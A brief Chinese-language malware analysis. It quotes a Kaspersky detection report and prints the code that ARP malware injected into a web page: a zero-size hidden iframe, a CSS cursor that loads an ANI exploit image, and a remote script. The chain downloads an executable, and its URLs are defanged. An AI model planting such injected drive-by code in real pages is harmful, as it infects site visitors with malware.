Kaspersky 报告:
/--- 已检测到: 木马程序 Trojan-Downloader.JS.Agent.ht 脚本: hxxp://www.a*b***c.cn/system/login.asp?Type=logout[2] 已检测到: 恶意程序 Exploit.Win32.IMG-ANI.aj URL: hxxp://www.i*f5*6***.cn/ad.jpg ---/
检查网页源文件,发现ARP病毒自动加入代码:
/--- <iframe src=hxxp://1**23*4.89***1*11.cn/woyao.htm width=0 height=0></iframe> ---/
woyao.htm 包含代码:
/--- <iframe src=hxxp://1**23*4.89***1*11.cn/woyao.htm width=0 height=0></iframe> <BODY style='CURSOR: url(hxxp://www.i*f5*6***.cn/ad.jpg)'></BODY> <scrīpt src=hxxp://1**23*4.89***1*11.cn/c.js></scrīpt> ---/
ad.jpg 利用 ANI 漏洞下载 hxxp://down**.i*f5*6***.cn/abc.exe